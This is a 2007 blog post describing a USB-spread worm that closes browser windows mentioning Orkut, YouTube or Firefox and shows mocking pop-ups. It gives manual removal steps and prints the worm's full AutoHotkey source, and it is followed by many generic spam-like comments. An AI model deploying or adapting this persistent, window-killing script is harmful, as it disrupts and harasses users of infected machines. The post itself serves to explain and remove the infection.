Orkut has banned you fool!

May 26th, 2007   •   29 Comments   

orkutHi Friends Today I’m going to share an interesting issue. This morning when I logged in to Gmail, I received one alert from my friend’s Sunil from Hyderabad ragarding something weird happening with his Laptop. He said he’s getting one weird pop-up message saying “Orkut has banned you fool! The administrators didn’t write this program guess who did?”. Quite interesting! Actually I heard about this problem few days back but never met any victim till today’s breakfast, but now I have one, my own close friend, after this I remotely logged in to his Laptop n get rid of it.

Here I’m posting its Solution, Technical details & Script that I got from this malware:
Name W32.USBWorm
Spread from USB/Pendrive

Tech Details:

Message displayed by W32.USBWorm

“I DNT HATE MOZILLA BUT USE IE OR ELSE…”

“USE INTERNET EXPLORER U DOPE”

“Orkut is banned you fool, The administrators didnt write this program guess who did??”

Solution:
Press Ctrl+Alt+Del/Esc
Go to “Process” tab
Arrange process name in ascending order by clicking on “Image Name”
Now look for services “svchost.exe” with User Name as “System”
Right Click it n say “End Process”
Click “Yes” if ask for confirmation, here u may receive one msg saying “System is shutting down in 60 second, save your all work”
Here u need to press “Win+R” key to bring run n then type “shutdown -a” to terminate System Shutdown.
Now go to “C:/Heap41a” n Shift+Del all file.

Hey congrats! your problem is Solved, Say thankx to God.

Original Script:
Pls keep this Script for Technical knowledge not to Exploit any one.

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA
BUT USE IE `r OR ELSE…,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}

}

return

If u need more information, mail me at real.whitehat@gmail.com

Share this article

29 Responses

  1. Congratulations for posting such a useful blog. Your blog isn’t only informative but also extremely artistic too. There usually are very few people who can write not so simple articles that creatively. Keep up the great work !!

  2. Intimately, the article is really the sweetest topic on this related issue. I agree with your conclusions and will thirstily look forward to your future updates. Saying thanks will not just be adequate, for the extraordinary lucidity in your writing. I will directly grab your rss feed to stay abreast of any updates.

  3. Stumbled across your post while searching via yahoo. I understand the 1st paragraph and its good! I don’t have enough time to finish it now, but I have bookmarked your website and will go through the rest tonight. : )

  4. Nice site! I enjoy a couple of of the articles which were written, and especially the comments posted! I will definately be visiting again!

  5. that is an interesting post dude great job

  6. Cashiobr4x says:

    that is a cool post dude great job

  7. Glad says:

    some truly great blog posts on this website , regards for contribution.

  8. I agree with your points , excellent post.

  9. This is actually SO very useful, many thanks for making this information available to all of us. I’ve been searching for a solution to the exact problem for that longest time!

  10. Jenny says:

    I really appreciate this wonderful post that you have provided for us.

  11. This site is mostly a walk-through for all the info you needed about this and didn抰 know who to ask. Glimpse right here, and also you抣l definitely discover it.

  12. tennis says:

    This site is cool. i visit here evaryday.

  13. Thanks for all the info, your blog is extremely helpful.

  14. Ara says:

    Hey quite wonderful site!! I’ll bookmark your web publication and endure the feeds additionally…

  15. Hello –I found your Blog on Google. I must say, I’m impressed with your site. I had no trouble navigating through all the tabs and information was very easy to access.Pretty awesome.

  16. Vand Oi says:

    Very nice blog and interesting article , thanks dude .I will come back on this PAGE

  17. Janis says:

    Thanks a lot for that extremely cool post.

  18. I think this is among the most significant information for me. And i am glad reading your article. But wanna remark on few general things, The web site style is ideal, the articles is really nice : D. Good job, cheers

  19. Bevera says:

    ‘;, I am really thankful to this topic because it really gives useful information ‘::

  20. Howy says:

    Is there anymore information you can give on this subject. It answers a lot of my questions but there is still more info I need. I will drop you an email if I can find it. Never mind I will just try the contact form. Hopefully you can help me further.

  21. Luis leoan says:

    Aw, this was a really nice post. In concept I wish to put in writing like this moreover – taking time and actual effort to make an excellent article… but what can I say… I procrastinate alot and by no means appear to get something done.

  22. Of course, what a fantastic blog and educative posts, I surely will bookmark your website.Have an awsome day!

  23. Cold Remedies says:

    ,,- thank you for posting a topic about this stuff, i was looking for it. :`:

  24. Chung says:

    it was good to know about this … getting more info on this ..will post the updates here .. :)

  25. INGAAS says:

    ~”- i am always fond of reading topics and issues about this one :;”

  26. staderregobb says:

    Awesome info over again! I am looking forward for more updates=)

  27. ‘:: i like the way you blogged about this topic which is of course very interesting -;’

  28. *`; this is one of the nicest blog that i have visited this year. “:.

  29. Dionna Gahn says:

    You completed certain good points there. I did a search on the issue and found most persons will agree with your blog.

Leave a Reply


  • three + = 12